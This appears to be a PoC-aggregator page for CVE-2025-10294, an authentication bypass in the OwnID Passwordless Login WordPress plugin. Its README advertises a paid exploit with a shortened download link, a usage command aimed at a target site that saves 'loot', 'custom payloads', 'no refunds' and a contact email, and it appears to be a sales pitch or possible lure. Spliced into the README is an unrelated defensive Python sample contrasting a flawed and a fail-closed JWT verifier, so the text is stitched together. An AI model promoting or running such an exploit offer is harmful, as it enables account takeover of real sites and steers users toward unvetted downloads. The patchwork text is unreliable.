PoC details: d5e301bffc19ef7833c76221f062e0e5b9e214d3

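Source
Related vulnerability
Title: WordPress plugin OwnID Passwordless Login security vulnerability (CVE-2025-10294)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers based on PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin OwnID Passwordless Login 1.3.4 and earlier contain a security vulnerability that stems from failing to properly check whether the ownid_shared_secret value is empty, which may lead to an authentication bypass attack.
Introduction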
# OwnID Passwordless Login Authentication Bypass (CVE-2025-10294)

### Summary
The OwnID plugin fails to properly validate the `ownid_shared_secret` header during JWT token processing in the authentication endpoint. This allows an attacker to forge a valid JWT payload without knowledge of the shared secret, granting unauthenticated access to any user account, including admins. No brute-force or prior creds needed – direct RCE potential via admin takeover.
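The vulnerability description at the top of this page attributes the bypass to a missing empty-value check on `ownid_shared_secret`. The following added example (not code from the plugin or from this README) puts a generic HS256 verifier that makes that mistake beside a fail-closed one; the function names, the 32-byte minimum and the sample claims are assumptions.

```python
import base64, hashlib, hmac, json
from typing import Optional

MIN_SECRET_BYTES = 32  # assumed policy value, not taken from the plugin

def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issuer side; used here only to build the constructed sample tokens."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(mac)}"

def verify_unchecked(token: str, secret: bytes) -> dict:
    """Flawed pattern: never asks whether a secret was configured at all."""
    header, body, sig = token.split(".")
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(body))

def verify_fail_closed(token: str, secret: Optional[bytes]) -> dict:
    """Hardened pattern: token login stays disabled until a real secret exists."""
    if not secret or len(secret) < MIN_SECRET_BYTES:
        raise PermissionError("shared secret not configured; token login disabled")
    header = token.split(".")[0]
    if json.loads(_b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    return verify_unchecked(token, secret)

if __name__ == "__main__":
    # Constructed sample: a half-installed site whose secret is still empty.
    stored_secret = b""
    token = sign_hs256({"sub": "admin"}, stored_secret)
    print("unchecked verifier accepts:", verify_unchecked(token, stored_secret))
    try:
        verify_fail_closed(token, stored_secret)
    except PermissionError as exc:
        print("fail-closed verifier rejects:", exc)
```

With an empty key the HMAC is a value anyone can compute, so the signature check alone proves nothing; the guard has to run before any signature comparison.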

## Vulnerability Details
- **CVE-ID:** CVE-2025-10294 / EUVD-2025-34544
- **Affected Component:** OwnID Passwordless Login plugin for WordPress
- **Versions Impacted:** <= 1.3.4
- **CWE:** 288 (Authentication Bypass Using an Alternate Path or Channel)
- **Severity:** Critical (CVSS 9.8)
- **Vendor:** OwnID
- **Patch:** Update to 1.3.5+


### Impact
- Unauthorized login as any WP user (admin/root access)
- Data exfil (posts, users, DB dumps)
- Site defacement/malware injection
- Backdoor persistence
- Lateral movement in multisite installs

### Prerequisites
- Target: WordPress site with OwnID Passwordless Login <=1.3.4 active
- Python 3.8+ (requests, PyJWT libs)
- Valid target URL (e.g., https://target.com/wp-json/ownid/v1/auth)

## Exploit
### **[Download here](https://tinyurl.com/3a8yz4r2)**

## Files Included (ZIP Contents)
| File | Description |
|------|-------------|
| README.txt | Full documentation and usage guide |
| exploit.py | Main Python exploit script |
| requirements.txt | Python dependencies |
| CHANGELOG.txt | Version history |
| poc_video.mp4 | 30s demo of exploit on live WP site |

### Usage
1. Get the full exploit files - [href](https://tinyurl.com/3a8yz4r2) (instant ZIP delivery with all scripts).
2. Unzip and install deps: `pip install -r requirements.txt`
3. Run: `python exploit.py -u https://target.com -t admin_username -p /tmp/loot.txt`


## Support & Contact
- Full Repo Access Includes: Updated scripts, custom payloads, 30-day support.
- No refunds – tested 40+ times.
- Legal: For authorized pentesting only. Buyer assumes all risk.
- **For inquiries, please contact: f0kinn@outlook.com**
File snapshot

[4.0K] /data/pocs/d5e301bffc19ef7833c76221f062e0e5b9e214d3
└── [2.1K] README.md

0 directories, 1 file